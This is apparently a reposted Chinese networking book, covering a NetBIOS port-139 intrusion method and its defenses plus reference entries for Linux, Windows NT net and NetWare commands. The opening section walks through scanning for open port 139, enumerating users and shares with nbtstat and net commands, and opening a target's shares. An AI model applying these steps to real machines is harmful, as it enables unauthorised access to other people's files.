  ?通过139端口入侵是网络攻击中常见的一种攻击手段,一般情况下139端口开启是由于NetBIOS网络协议的使用。NetBIOS即网络基本输入输出系统,系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址,从而实现信息通讯。在局域网内部使用NetBIOS协议可以非常方便地实现消息通信,但是如果在Internet上,NetBIOS就相当于一个后门程序,很多攻击者都是通过NetBIOS漏洞发起攻击。下面就来介绍一下通过139端口入侵和防范的方法。
  139攻击
  通过139端口入侵,攻击者首先需要查找网络上存在139端口漏洞的主机地址,在查找此类主机过程中,可以使用一些扫描工具,比如SuperScan就是典型的端口扫描工具之一。在SuperScan开始IP地址中输入需要扫描的起始地址,然后在停止中填写好扫描结束的IP地址,然后单击[开始]按钮即可开始扫描。扫描结束后,在列表中可以查看目标主机打开的端口,每一个端口后面都有关于这个端口的简短说明。
  如果已经查获一台存在139端口漏洞的主机,这时就可以在命令行方式下使用“nbtstat-a[IP地址]”这个命令获得用户的信息情况,并获得攻击主机名称和工作组。接下来攻击者需要做的就是实现与攻击目标资源共享。使用NetView和Netuser命令显示计算机列表和共享资源,并使用nbtstat-r和nbtstat-c命令查看具体的用户名和IP地址。
  单击Windows桌面[开始]按钮,然后执行“查找/计算机”命令,填写刚才查找到的主机名称,就可以找到这台电脑了。双击主机名称即可打开指定的计算机。
  防范139攻击
  对于139端口攻击的防范针对不同系统的设置也有所不同,下面就来分别描述。
  针对使用Windows9x系统拨号上网用户,可以不必登录到NT局域网络环境,打开控制面板,然后双击“网络”图标,在“主网络登录”中选择“Microsoft友好登录”,不必选择“Windows网络用户”方式。此外,也不必设置“文件打印共享”。
  对于WindowsNT用户,可以取消NetBIOS与TCP/IP协议的绑定,打开“控制面板”,然后双击“网络”图标,在“NetBIOS接口”中选择“WINS客户(TCP/IP)”为“禁用”,并重新启动计算机即可。
  Windows2000用户可以使用鼠标右键单击“网络邻居”图标,然后选择“属性”命令,打开“网络和拨号连接”对话框,用鼠标右键单击“本地连接”图标,然后执行“属性”命令,打开“本地连接属性”对话框。双击“Internet协议(TCP/IP)”,在打开的对话框中单击[高级]按钮。打开“高级TCP/IP设置”对话框,选择“选项”选项卡,在列表中单击选中“TCP/IP筛选”选项。
  单击[属性]按钮,在“只允许”单击[添加]按钮,填入除了139之外要用到的端口。
  使用防火墙防范攻击
  对于个人上网用户可以使用“天网防火墙”定制防火墙规则。启动“天网个人防火墙”,选择一条空规则,设置数据包方向为“接收”,对方IP地址选“任何地址”,协议设定为“TCP”,本地端口设置为“139到139”,对方端口设置为“0到0”,设置标志位为“SYN”,动作设置为“拦截”,最后单击[确定]按钮,并在“自定义IP规则”列表中勾选此规则即可启动拦截139端口攻击了。
u幽書擝 uUtXT。Com 全汶自扳越渎


第二卷 第一章 字数:5438
  ?netstat命令的功能是显示网络连接、路由表和网络接口信息,可以让用户得知目前都有哪些网络连接正在运作。
  该命令的一般格式为:
  netstat[选项]
  命令中各选项的含义如下:
  -a显示所有socket,包括正在监听的。
  -c每隔1秒就重新显示一遍,直到用户中断它。
  -i显示所有网络接口的信息,格式同“ifconfig-e”。
  -n以网络IP地址代替名称,显示出网络连接情形。
  -r显示核心路由表,格式同“route-e”。
  -t显示TCP协议的连接情况。
  -u显示UDP协议的连接情况。
  -v显示正在进行的工作。
  [例]在本地机上使用netstat命令。
  $netstat
  ActiveInternetconnections(w/oservers)
  ProtoRecv-QSend-QLocalAddressForeignAddressState
  ActiveUNIXdomainsockets(w/oservers)
  ProtoRefCntFlagsTypeStateI-NodePath
  unix1[]STREAMCONNECTED270@00000008
  unix1[]STREAMCONNECTED150@00000002
  unix1[]STREAMCONNECTED104@00000001
  unix1[]STREAMCONNECTED222@00000004
  unix1[]STREAMCONNECTED171@00000003
  unix1[]STREAMCONNECTED271/dev/log
  unix1[]STREAMCONNECTED225/dev/log
  unix1[]STREAMCONNECTED223/dev/log
  unix1[]STREAMCONNECTED203/dev/log
  unix1[]STREAMCONNECTED105/dev/log
  ……
  nslookup命令
  nslookup命令的功能是查询一台机器的IP地址和其对应的域名。它通常需要一台域名服务器来提供域名服务。如果用户已经设置好域名服务器,就可以用这个命令查看不同主机的IP地址对应的域名。
  该命令的一般格式为:
  nslookup[IP地址/域名]
  [例]在本地机上使用nslookup命令。
  $nslookup
  DefaultServer:name.tlc.com.cn
  Address:192.168.1.99
  >
  在符号“>”后面输入要查询的IP地址或域名并回车即可。如果要退出该命令,输入exit并回车即可。
  finger命令
  finger命令的功能是查询用户的信息,通常会显示系统中某个用户的用户名、主目录、停滞时间、登录时间、登录shell等信息。如果要查询远程机上的用户信息,需要在用户名后面接“@主机名”,采用[用户名@主机名]的格式,不过要查询的网络主机需要运行finger守护进程。
  该命令的一般格式为:
  finger[选项][使用者][用户@主机]
  命令中各选项的含义如下:
  -s显示用户的注册名、实际姓名、终端名称、写状态、停滞时间、登录时间等信息。-l除了用-s选项显示的信息外,还显示用户主目录、登录shell、邮件状态等信息,以及用户主目录下的.plan、.project和.forward文件的内容。
  -p除了不显示.plan文件和.project文件以外,与-l选项相同。
  [例]在本地机上使用finger命令。
  $fingerxxq
  Login:xxqName:
  Directory:/home/xxqShell:/bin/bash
  LastloginThuJan121:43(CST)ontty1
  Nomail.
  NoPlan.
  $finger
  LoginNameTtyIdleLoginTimeOfficeOfficePhone
  rootroot*128Nov2509:17
  ……
  ping命令
  ping命令用于查看网络上的主机是否在工作,它向该主机发送ICMPECHO_REQUEST包。有时我们想从网络上的某台主机上下载文件,可是又不知道那台主机是否开着,就需要使用ping命令查看。
  该命令的一般格式为:
  ping[选项]主机名/IP地址
  命令中各选项的含义如下:
  -c数目在发送指定数目的包后停止。
  -d设定SO_DEBUG的选项。
  -f大量且快速地送网络封包给一台机器,看它的回应。
  -I秒数设定间隔几秒送一个网络封包给一台机器,预设值是一秒送一次。
  -l次数在指定次数内,以最快的方式送封包数据到指定机器(只有超级用户可以使用此选项)。
  -q不显示任何传送封包的信息,只显示最后的结果。
  -r不经由网关而直接送封包到一台机器,通常是查看本机的网络接口是否有问题。
  -s字节数指定发送的数据字节数,预设值是56,加上8字节的ICMP头,一共是64ICMP数据字节。
  TurboLinux系统提供了大量命令和许多实用工具软件,本书由于篇幅的关系,主要介绍了TurboLinux的一些常用命令和实用软件。读者可以使用系统提供的联机帮助手册获取更多的信息。
  TurboLinux系统的联机手册中有大量的可用信息,根据其内容分成若干节。在Linux联机帮助手册上,几乎每个命令都有说明。因此,当用户对于Linux上的一个命令不会用或是不太了解时,就请使用联机帮助命令。
  本章主要介绍几个常用的联机帮助命令。包括:
  man查询每个命令的使用方法
  help查询Shell命令
  whereis查询某个命令的位置
  locate查询某个文件的位置
  man命令
  这个命令应该是每个Linux系统上都有的。它格式化并显示在线的手册页。通常使用者只要在命令man后,输入想要获取的命令的名称(例如ls),man就会列出一份完整的说明,其内容包括命令语法、各选项的意义以及相关命令等。
  该命令的一般形式为:
  man[选项]命令名称
  命令中各选项的含义分别为:
  -M路径指定搜索man手册页的路径,通常这个路径由环境变量MANPATH预设,如果在命令行上指定另外的路径,则覆盖MANPATH的设定。
  -P命令指定所使用的分页程序,缺省使用/usr/bin/less–is,在环境变量MANPAGER中预设。
  -S章节由于一个命令名称可能会有很多类别,至于类别,列出如下:
  章节说明
  1一般使用者的命令
  2系统调用的命令
  3C语言函数库的命令
  4有关驱动程序和系统设备的解释
  5配置文件的解释
  6游戏程序的命令
  7其他的软件或是程序的命令
  有关系统维护的命令
  -a显示所有的手册页,而不是只显示第一个。
  -d这个选项主要在检查时使用,如果用户加入了一个新的文件,就可以用这个选项检查是否出错,这个选项并不会列出文件内容。
  -f只显示出命令的功能而不显示其中详细的说明文件。
  -pstring设定运行的预先处理程序的顺序,共有下列几项:
  eeqnttbl
  ggraprrefer
  ppicvvgrind
  -w不显示手册页,只显示将被格式化和显示的文件所在位置。
  例如:查看cd命令的使用方法。
  $mancd
  cd(n)TclBuilt-InCommandscd(n)
  _________________________________________________________________
  NAME
  cd-Changeworkingdirectory
  SYNOPSIS
  cd?dirName?
  _________________________________________________________________
  DESCRIPTION
  ChangethecurrentworkingdirectorytodirName
  ortothe
  homedirectory(asspecifiedintheHOMEenvironmentvari-
  able)ifdirNameisnotgiven.Returnsanemptystring.
  KEYWORDS
  workingdirectory
  Tcl1
  (END)
  可以按q键退出man命令。
  help命令
  help命令用于查看所有Shell命令。用户可以通过该命令寻求Shell命令的用法,只需在所查找的命令后输入help命令,就可以看到所查命令的内容了。
  例如:查看od命令的使用方法。
  $od--help
  whereis命令
  这个程序的主要功能是寻找一个命令所在的位置。例如,我们最常用的ls命令,它是在/bin这个目录下的。如果希望知道某个命令存在哪一个目录下,可以用whereis命令来查询。
  该命令的一般形式为:
  whereis[选项]命令名
  说明:一般直接使用不加选项的whereis命令,但用户也可根据特殊需要选用它的一些选项。
  该命令中各选项的含义分别为:
  b只查找二进制文件
  m查找主要文件
  s查找来源
  u查找不常用的记录文件
  例如:查找ls命令在什么目录下。
  $whereisls
  ls:/bin/ls/usr/man/man1/ls.1
滺幽书盟 uUTXT。COm 铨纹自版越渎


第二卷 第二章 字数:15858
  ?许多WindowsNT网络命令以net开始。这些net命令有一些公共属性:
  通过键入net/?可查阅所有可用的net命令。
  通过键入nethelp命令可在命令行中获得net命令的语法帮助。例如,要得到netacco
  unts命令的帮助,请键入nethelpaccounts。
  所有net命令接受选项/yes和/no(可缩写为/y和/n)。/y对命令产生的任何交互提示自动回答“是”,/n回答“否”。例如,netstopserver通常提示确认是否根据服务器服务结束所有服务,netstopserver/y自动回答“是”并关闭服务器服务。
  NetAccounts
  更新用户帐号数据库、更改密码及所有帐号的登录要求。必须要在更改帐号参数的计算机上运行网络登录服务。
  netaccounts[/forcelogoff:{minutes|no}][/minpwlen:length][/maxpwage:{days|
  unlimited}][/minpwage:days][/uniquepw:number][/domain]
  netaccounts[/sync][/domain]
  参数
  无
  键入不带参数的netaccounts,将显示当前密码设置、登录时限及域信息。
  /forcelogoff:{minutes|no}
  设置当用户帐号或有效登录时间过期时,结束用户和服务器会话前的等待时间。no选项禁止强行注销。该参数的默认设置为no。指定/forcelogoff:minutes之后,WindowsNT在其强制用户退出网络minutes分钟之前,将给用户发出警报。如果还有打开的文件,WindowsNT将警告用户。如果minutes小于两分钟,WindowsNT警告用户立即从网络注销。
  /minpwlen:length
  设置用户帐号密码的最少字符数。允许范围是0-14,默认值为6。
  /maxpwage:{days|unlimited}
  设置用户帐号密码有效的最大天数。unlimited不设置最大天数。/maxpwage选项的天数必须大于/minpwage。允许范围是1-49
  710天(unlimited)。默认值为90天。
  /minpwage:days
  设置用户必须保持原密码的最小天数。0值不设置最小时间。允许范围是0-49
  710天,默认值为0天。
  /uniquepw:number
  要求用户更改密码时,必须在经过number次后,才能重复使用与之相同的密码。允许范围是0-8。默认值为5。
  /domain
  在当前域的主域控制器上执行该操作。否则只在本地计算机执行操作。
  该参数仅用于WindowsNTServer域中的WindowsNTWorkstation计算机,WindowsNTServer计算机默认为在主域控制器执行操作。
  /sync
  当用于主域控制器时,该命令使域中所有备份域控制器同步;当用于备份域控制器时,该命令仅使该备份域控制器与主域控制器同步。该命令仅适用于WindowsNTServer域成员的计算机。
  NetComputer
  从域数据库中添加或删除计算机。该命令仅在运行WindowsNTServer的计算机上可用。
  netcomputer\computername{/add|/del}
  参数
  \computername
  指定要添加到域或从域中删除的计算机。
  /add
  将指定计算机添加到域。
  /del
  将指定计算机从域中删除。
  NetConfig
  显示当前运行的可配置服务,或显示并更改某项服务的设置。
  netconfig[service[options]]
  参数
  无
  键入不带参数的netconfig将显示可配置服务的列表。
  service
  通过netconfig命令进行配置的服务(server或workstation)。
  options
  服务的特定选项。完整语法请参阅netconfigserver或netconfigworkstation。
  NetConfigServer
  运行服务时显示或更改服务器的服务设置。
  netconfigserver[/autodisconnect:time][/srvcomment:"text"][/hidden:{yes|n
  o}]
  参数
  无
  键入不带参数的netconfigserver,将显示服务器服务的当前配置。
  /autodisconnect:time
  设置断开前用户会话闲置的最大时间值。可以指定-1,表示永不断开连接。允许范围是-1-65535分钟,默认值是15分钟。
  /srvcomment:"text"
  为服务器添加注释,可以通过netview命令在屏幕上显示所加注释。注释最多可达48个字符,文字要用引号引住。
  /hidden:{yes|no}
  指定服务器的计算机名是否出现在服务器列表中。请注意隐含某个服务器并不改变该服务器的权限。默认为no。
  NetConfigWorkstation
  服务运行时,显示或更改工作站各项服务的设置。
  netconfigworkstation[/charcount:bytes][/chartime:msec][/charwait:sec]
  参数
  无
  键入不带参数的netconfigworkstation将显示本地计算机的当前配置。
  /charcount:bytes
  指定WindowsNT在将数据发送到通讯设备之前收集的数据量。如果同时设置/chartime:msec参数,WindowsNT按首先满足条件的选项运行。允许范围是0-65535字节,默认值是16字节。
  /chartime:msec
  指定WindowsNT在将数据发送到通讯设备之前收集数据的时间。如果同时设置/charcount:bytes参数,WindowsNT按首先满足条件的选项运行。允许范围是0-65535000毫秒,默认值是250毫秒。
  /charwait:sec
  设置WindowsNT等待通讯设备变为可用的时间。允许的范围是0-65535秒,默认值是3600秒。
  NetContinue
  重新激活挂起的服务。
  netcontinueservice
  参数
  service
  能够继续运行的服务,包括:fileserverformacintosh(该服务仅限于WindowsNTServer)
  ftppublishingservice
  lpdsvc
  netlogon
  networkdde,networkddedsdm,ntlmsecuritysupportprovider,remoteboot(该服务仅限于WindowsNTServer),remoteaccessserver
  schedule,server,simpletcp/ipservices及workstation。
  NetFile
  显示某服务器上所有打开的共享文件名及锁定文件数。该命令也可以关闭个别文件并取消文件锁定。
  netfile[id[/close]]
  参数
  无
  键入不带参数的netfile可获得服务器上打开文件的列表。
  id
  文件标识号。
  /close
  关闭打开的文件并释放锁定记录。请从共享文件的服务器中键入该命令。
  NetGroup
  在WindowsNTServer域中添加、显示或更改全局组。该命令仅在WindowsNTServer域中可用。
  netgroup[groupname[/comment:"text"]][/domain]
  netgroupgroupname{/add[/comment:"text"]|/delete}[/domain]
  netgroupgroupnameusername[...]{/add|/delete}[/domain]
  参数
  无
  键入不带参数的netgroup可以显示服务器名称及服务器的组名称。
  groupname
  要添加、扩展或删除的组。仅提供某个组名便可查看组中的用户列表。
  /comment:"text"
  为新建组或现有组添加注释。注释最多可以是48个字符,并用引号将注释文字引住。
  /domain
  在当前域的主域控制器中执行该操作,否则在本地计算机上执行操作。
  该参数仅用于作为WindowsNTServer域成员的WindowsNTWorkstation计算机。WindowsNTServer计算机默认为在主域控制器中操作。
  username[...]
  列表显示要添加到组或从组中删除的一个或多个用户。使用空格分隔多个用户名称项。
  /add
  添加组或在组中添加用户名。必须使用该命令为添加到组中的用户建立帐号。
  /delete
  删除组或从组中删除用户名。
  NetHelp
  提供网络命令列表及帮助主题,或提供指定命令或主题的帮助。可用网络命令列于N下面的“命令参考”中“命令”窗口内。
  nethelp[command]
  netcommand{/help|/?}
  参数
  无
  键入不带参数的nethelp显示能够获得帮助的命令列表和帮助主题。
  command
  需要其帮助的命令,不要将net作为command的一部分。
  /help
  提供显示帮助文本方式选择。
  /?
  显示命令的正确语法。
  NetHelpmsg
  提供WindowsNT错误信息的帮助。
  nethelpmsgmessage#
  参数
  message#
  需要其帮助的WindowsNT消息的四位代码。
  NetLocalgroup
  添加、显示或更改本地组。
  netlocalgroup[groupname[/comment:"text"]][/domain]
  netlocalgroupgroupname{/add[/comment:"text"]|/delete}[/domain]
  netlocalgroupgroupnamename[...]{/add|/delete}[/domain]
  参数
  无
  键入不带参数的netlocalgroup将显示服务器名称和计算机的本地组名称。
  groupname
  要添加、扩充或删除的本地组名称。只提供groupname即可查看用户列表或本地组中的全局组。
  /comment:"text"
  为新建或现有组添加注释。注释文字的最大长度是48个字符,并用引号引住。
  /domain
  在当前域的主域控制器中执行操作,否则仅在本地计算机上执行操作。
  该参数仅应用于WindowsNTServer域中的WindowsNTWorkstation计算机。WindowsNTServer计算机默认为在主域控制器中操作。
  name[...]
  列出要添加到本地组或从本地组中删除的一个或多个用户名或组名,多个用户名或组名之间以空格分隔。可以是本地用户、其他域用户或全局组,但不能是其他本地组。如果是其他域的用户,要在用户名前加域名(例如,SALESRALPHR)。
  /add
  将全局组名或用户名添加到本地组中。在使用该命令将用户或全局组添加到本地组之前,必
  须为其建立帐号。
  /delete
  从本地组中删除组名或用户名。
  NetName
  添加或删除消息名(有时也称别名),或显示计算机接收消息的名称列表。要使用netname命令,计算机中必须运行信使服务。
  netname[name[/add|/delete]]
  参数
  无
  键入不带参数的netname将列出当前使用的名称。
  name
  指定接收消息的名称。名称最多为15个字符。
  /add
  将名称添加到计算机中。/add是可选项,键入netnamename与键入netnamename/add相同。
  /delete
  从计算机中删除名称。
  NetPause
  暂停正在运行的服务。
  netpauseservice
  参数
  service
  指下列服务:fileserverformacintosh(仅限于WindowsNTServer)、ftppublishingservice、lpdsvc、netlogon、networkdde、networkddedsdm、ntlmsecuritysupportprovider、remoteboot(仅限于WindowsNTServer)、remoteaccessserver、schedule、server、simpletcp/ipservices或workstation。
  NetPrint
  显示或控制打印作业及打印队列。
  netprint\computernamesharename
  netprint[\computername]job#[/hold|/release|/delete]
  参数
  computername
  共享打印机队列的计算机名。
  sharename
  打印队列名称。当包含computername与sharename时,使用反斜杠()将它们分开。
  job#
  在打印机队列中分配给打印作业的标识号。有一个或多个打印机队列的计算机为每个打印作业分配唯一标识号。如果某个作业号用于共享打印机队列中,则不能指定给其他作业,也不能分配给其他打印机队列中的作业。
  /hold
  使用job#时,在打印机队列中使打印作业等待。打印作业停留在打印机队列中,并且其他打印作业只能等到释放该作业之后才能进入。
  /release
  释放保留的打印作业。
  /delete
  从打印机队列中删除打印作业。
  NetSend
  向网络的其他用户、计算机或通信名发送消息。要接收消息必须运行信使服务。
  netsend{name|*|/domain[:name]|/users}message
  参数
  name
  要接收发送消息的用户名、计算机名或通信名。如果计算机名包含空字符,则要将其用引号("")引住。
  *
  将消息发送到组中所有名称。
  /domain[:name]
  将消息发送到计算机域中的所有名称。如果指定name,则消息将发送到指定域或组中的所有名称。
  /users
  将消息发送到与服务器连接的所有用户。
  message
  作为消息发送的文本。
  NetSession
  列出或断开本地计算机和与之连接的客户端的会话。
  netsession[\computername][/delete]
  参数
  无
  键入不带参数的netsession可以显示所有与本地计算机的会话的信息。
  \computername
  标识要列出或断开会话的计算机。
  /delete
  结束与\computername计算机会话并关闭本次会话期间计算机的所有打开文件。如果省略\computername参数,将取消与本地计算机的所有会话。
  NetShare
  创建、删除或显示共享资源。
  netsharesharename
  netsharesharename=drive:path[/users:number|/unlimited][/remark:"text"]
  netsharesharename[/users:number|unlimited][/remark:"text"]
  netshare{sharename|drive:path}/delete
  参数
  无
  键入不带参数的netshare将显示本地计算机上所有共享资源的信息。
  sharename
  是共享资源的网络名称。键入带sharename的netshare命令,只显示该共享信息。
  drive:path
  指定共享目录的绝对路径。
  /users:number
  设置可同时访问共享资源的最大用户数。
  /unlimited
  不限制同时访问共享资源的用户数。
  /remark:"text"
  添加关于资源的注释,注释文字用引号引住。
  /delete
  停止共享资源。
  NetStart
  启动服务,或显示已启动服务的列表。如果服务名是两个或两个以上的词,如NetLogon或ComputerBrowser,则必须用引号(")引住。.
  netstart[service]
  参数
  无
  键入不带参数的netstart则显示运行服务的列表。
  service
  包括下列服务:alerter、clientservicefornetware、clipbookserver、computerbrowser、dhcpclient、directoryreplicator、eventlog、ftppublishingservice、lpdsvc、messenger、netlogon、networkdde、networkddedsdm、networkmonitoringagent、ntlmsecuritysupportprovider、ole、remoteaccessconnectionmanager、remoteaccessisnsapservice、remoteaccessserver、remoteprocedurecall(rpc)locator、remoteprocedurecall(rpc)service、schedule、server、simpletcp/ipservices、snmp、spooler、tcp/ipnetbioshelper、ups及workstation
  。
  下列服务仅在WindowsNTServer下可用:fileserverformacintosh、gatewayservicefornetware、microsoftdhcpserver、printserverformacintosh、remoteboot、windowsinternetnameservice。
  NetStatistics
  显示本地工作站或服务器服务的统计记录。
  netstatistics[workstation|server]
  参数
  无
  键入不带参数的netstatistics将列出其统计信息可用的运行服务。
  workstation
  显示本地工作站服务的统计信息。
  server
  显示本地服务器服务的统计信息。
  NetStop
  停止WindowsNT网络服务。
  netstopservice
  参数
  service
  包括下列服务:alerter(警报)、clientservicefornetware(Netware客户端服务)、clipbookserver(剪贴簿服务器)、computerbrowser(计算机浏览器)、directoryreplicator(目录复制器)、ftppublishingservice(ftp)(ftp发行服务)、lpdsvc、messenger(信使)、netlogon(网络登录)、networkdde(网络dde)、networkddedsdm(网络ddedsdm)、networkmonitoragent(网络监控代理)、ntlmsecuritysupportprovider(NTLM安全性支持提供)、ole(对象链接与嵌入)、remoteaccessconnectionmanager(远程访问连接管理器)、remoteaccessisnsapservice(远程访问isnsap服务)、remoteaccessserver(远程访问服务器)、remoteprocedurecall(rpc)locator(远程过程调用定位器)、remoteprocedurecall(rpc)service(远程过程调用服务)、schedule(调度)、server(服务器)、simpletcp/ipservices(简单TCP/IP服务)、snmp、spooler(后台打印程序)、tcp/ipnetbioshelper(TCP/IPNETBIOS辅助工具)、ups及workstation(工作站)。
  下列服务仅在WindowsNTServer中可用:fileserverformacintosh、gatewayservicefornetware、microsoftdhcpserver、printserverformacintosh、remoteboot、windowsinternetnameservice。
  NetTime
  使计算机的时钟与另一台计算机或域的时间同步。不带/set参数使用时,将显示另一台计算机或域的时间。
  nettime[\computername|/domain[:name]][/set]
  参数
  \computername
  要检查或同步的服务器名。
  /domain[:name]
  指定要与其时间同步的域。
  /set
  使本计算机时钟与指定计算机或域的时钟同步。
  NetUse
  连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。该命令也控制永久网络连接。
  netuse[devicename|*][\computernamesharename[volume]][password|*]][/user:[domainname]username][[/delete]|[/persistent:{yes|no}]]netusedevicename[/home[password|*]][/delete:{yes|no}]netuse[/persistent:{yes|no}]
  参数
  无
  键入不带参数的netuse将列出网络连接。
  devicename
  指定要连接到的资源名称或要断开的设备名称。有两类设备名:磁盘驱动器(D:到Z:)和打印机(LPT1:到LPT3)。若键入星号而不是指定设备名将分配下一个可用设备名。
  \computernamesharename
  服务器及共享资源的名称。如果计算机名包含空白字符,要用引号("")将双反斜线及计算机名引住。计算机名长度可以是1-15个字符。
  volume
  指定服务器上的NetWare卷。要连接到NetWare服务器,必须安装并运行NetWare客户机服务(WindowsNTWorkstation)或NetWare网关服务(WindowsNTServer)。
  password
  访问共享资源的密码。
  *
  提示键入密码。在密码提示行中键入密码时,将不显示该密码。
  /user
  指定进行连接的另外一个用户。
  domainname
  指定另一个域。例如netused:\servershare/user:adminmariel连接用户mariel,如同从admin域连接一样。如果省略域,将使用当前登录域。
  username
  指定登录的用户名。
  /home
  将用户连接到其宿主目录。
  /delete
  取消指定网络连接。如果用户以星号指定连接,则取消所有网络连接。
  /persistent
  控制永久网络连接的使用。默认为上次使用的设置。无设备的连接不是永久的。
  yes
  保存建立的所有连接,并在下次登录时还原。
  no
  不保存建立的连接和继发连接,并在下次登录时还原现有连接。使用/delete开关项取消永久连接。
  NetUser
  添加或更改用户帐号或显示用户帐号信息。
  netuser[username[password|*][options]][/domain]
  netuserusername{password|*}/add[options][/domain]
  netuserusername[/delete][/domain]
  参数
  无
  键入不带参数的netuser将查看计算机上的用户帐号列表。
  username
  添加、删除、更改或查看用户帐号名。用户帐号名最多可以有20个字符。
  password
  为用户帐号分配或更改密码。密码必须满足在netaccounts命令/minpwlen选项中设置的最小参数。最多是14个字符。
  *
  提示输入密码。在密码提示行中键入密码时,将不显示该密码。
  /domain
  在计算机主域的主域控制器中执行操作。
  该参数仅在WindowsNTServer域成员的WindowsNTWorkstation计算机上可用。默认情况下,WindowsNTServer计算机在主域控制器中执行操作。
  注意:在计算机主域的主域控制器发生该动作。它可能不是登录域。
  /add
  将用户帐号添加到用户帐号数据库。
  /delete
  从用户帐号数据库中删除用户帐号。
  选项如下所示:
  /active:{no|yes}
  启用或禁止用户帐号。如果不激活用户帐号,用户就不能访问计算机上的资源。默认值是yes(激活)。
  /comment:"text"
  提供用户帐号的注释。该注释最多可以有48个字符,文字用引号引住。
  /countrycode:nnn
  使用操作系统的国家代码以便为用户帮助和错误信息文件提供指定语言文件。0值表示默认国家代码。
  /expires:{date|never}
  如果设置date,将导致用户帐号过期,never不对用户帐号设置时间限制。过期日期根据/countrycode值可以是下列格式:mm/dd/yy、dd/mm/yy或mmm
  dd
  yy。注意帐号在指定日期开始时过期。月份可以是数字、全名或三个字母的简拼。年可以是两位或四位数,使用逗号或斜线(不要用空格)区分日期的各部分。如果省略yy,则使用该日期下一次到来的年份(根据计算机的时钟)。例如如果在1994年1月10日到1995年1月8日之间输入下列日期项,那它们相同:jan
  91/9/95
  january
  9
  1995
  1/9
  /fullname:"name"
  指定用户全名而不是用户名。用引号将名字引住。
  /homedir:path
  设置用户宿主目录的路径。该路径必须存在。
  /homedirreq:{yes|no}
  设置是否需要宿主目录。
  /passwordchg:{yes|no}
  指定用户是否能改变自己的密码。默认值是yes。
  /passwordreq:{yes|no}
  指定用户帐号是否需要密码,默认值是yes。
  /profilepath:[path]
  设置用户登录配置文件的路径。该路径名指向注册表配置文件。
  /scriptpath:path
  为用户登录脚本设置路径。Path不能是绝对路径;
  path是相对于%systemroot%SYSTEM32REPLIMPORTSCRIPTS的相对路径:。
  /times:{times|all}
  指定允许用户使用计算机的时间。times值表示为day[-day][
  day[-day]]
  time[-time][
  time[-time]]
  增量限制为一小时。Days可以是全名或简写(M、T、W、Th、F、Sa、Su)。Hours可以是12小时制或24小时制。对于12小时值,使用AM、PM或A.M、P.M。all表示用户总可以登录。空值表示用户永远不能登录。用逗号分隔日期和时间,分隔时间和日期的单位用分号(例如M
  4AM-5PM;T
  1PM-3PM)。指定/times时不要使用空格。
  /usercomment:"text"
  让管理员添加或更改帐号的“用户注释”。用引号引住文字。
  /workstations:{computername[
  ...]|*}
  列出最多八个用户可以登录到网络的工作站。用逗号分隔列表中的多个项。如果/workstations没有列表,或如果列表是星号“*”,则用户可以从任何一台计算机登录。
  NetView
  显示域列表、计算机列表或指定计算机的共享资源列表。
  netview[\computername|/domain[:domainname]]
  netview/network:nw[\computername]
  参数
  无
  键入不带参数的netview将显示当前域的计算机列表。
  \computername
  指定要查看其共享资源的计算机。
  /domain[:domainname]
  指定要查看其可用计算机的域。如果省略domainname,则显示网络的所有域。
  /network:nw
  显示NetWare网络中所有可用的服务器。如果指定计算机名,则显示NetWare网络中该计算机的可用资源。也可以用此开关指定添加到系统中的其他网络。
幽U書擝 UUTxt。cOM 铨汶字板粤渎


第二卷 第三章 字数:2356
  ?1,ACONSOLE
  用来接收可传送远端文件服务器的屏幕和键盘数据的管理程序。
  2,ALLOW
  查看或修改目录或文件的继承权(Inheriterrights).
  3,CASTOFF
  作用是使接收消息的功能失效。目的是防止当前进行的工作被干扰可打断。
  4,CASTON
  恢复接收消息的能力。
  5,CHKDIR
  用来查看某个目录所占用的空间。
  6,CHKVOL
  用来查看卷的磁盘空间。
  7,COLORPAL
  用来改变各通用程序的颜色,建议使用缺省值。
  ColorPalette0:改变菜单的底色,菜单中的字样光标及外框的颜色。
  ColorPalette1:改变屏幕的背景颜色和主标题的颜色。
  ColorPalette2:改变帮助窗口的颜色。
  ColorPalette3:改变错误信息的颜色。
  ColorPalette4:改变退出与警告的画面颜色。
  8,DSPACE
  与SYSCON的“volume/DiskPestnetions”的功能相同,如果是SUPERVISOR则可设置其它用户的磁盘空间,如果是用户本身则只能查看自己的磁盘空间,另一功能是列出和改变连接到其他的FILESERVER。
  9,FCONSOLE
  可作为广播消息。
  改变到其他的FILESERVER。
  连接到FILESERVER的信息。
  关闭FILESERVER。
  查看FILESERVER的版本等。
  10,FLAG
  属性可以在网络中提供目录或文件的安全性更多一层人保障,它有下列功能:
  1,防止文件被写入
  2,防止文件被拷贝。
  3,防止目录/文件被误删。
  4,防止目录/文件内容被查看。
  以上功能与DOS的ATTRIB的功能相当,但其余的功能在网络上具有特殊的用途。
  1,加上SHARABLE属性,则在同一时间内可让多位用户使用。
  2,加上ARCHIVENEEDED,经跟踪的文件能被自动自制。
  11,FLAGDIR
  用来查阅可改变目录/文件属性,也可用FILER设置文件属性。
  12,GRANT
  赋予用户成为某目录/文件的使用者。
  13,LISTDIR
  1,查看某目录下的子目录。
  2,查看每一个子目录的继承权限屏蔽。
  3,查看每一个子目录的有效权限。
  4,查看每一个子目录的建立日期与时间。
  5,查看子目录其所属的子目录。
  14,NCOPY
  除具备DOS的COPY功能外,还可以在网络中不同的FILESERVER的卷与目录间相互拷贝,并保留原先的文件属性。
  15,NDIR
  除具备DOS的DIR相同的功能外,还能查询文件属性,有效权限,继承权限,拥有者等信息。
  16,NVER
  它包含以下内容:NetBIOS
  IPX
  SPX
  LANdriver
  shell
  dos版本,FILERSERVER版本。
  17,PURGE与SALVAGE
  PURGE是永久删除文件,而SALVAGE可恢复非永久删除文件。
  18,REMOVE
  用REMOVE可从文件或目录中的继承权列表中删除一个用户或一个组。即文件或目录的用户或组将被删除。
  19,RENDIR
  更改目录的名称。
  20,REVOKE
  用它可删除用户可组中对文件或目录的受托者权限,即用户或组所使用的文件或目录将被删除。
  21,SEND
  用它可传送一个消息给所有已登录的用户,可列出用户列表,或连接号码列表。
  22,SESSION
  1,连接到其他的FILESERVER。
  2,磁盘映象。
  3,查看网络上的组或传送一些消息给组。
  4,暂时地建立,改变或删除搜索磁盘驱动器。
  5,选择缺省。
  6,列出用户信息并传送消息给用户。
  23,SETPASS
  可建立可修改一个可多个FILESERVER的密码,也可使多重FILESERVER上的password同步化。
  24,SETTTS
  使用它可保证事务跟踪系统的有效使用。
  25,SLIST
  它是用来查处在多重网络上的FILESERVER列表及关于这此FILESERVER的信息。
  26,SMODE
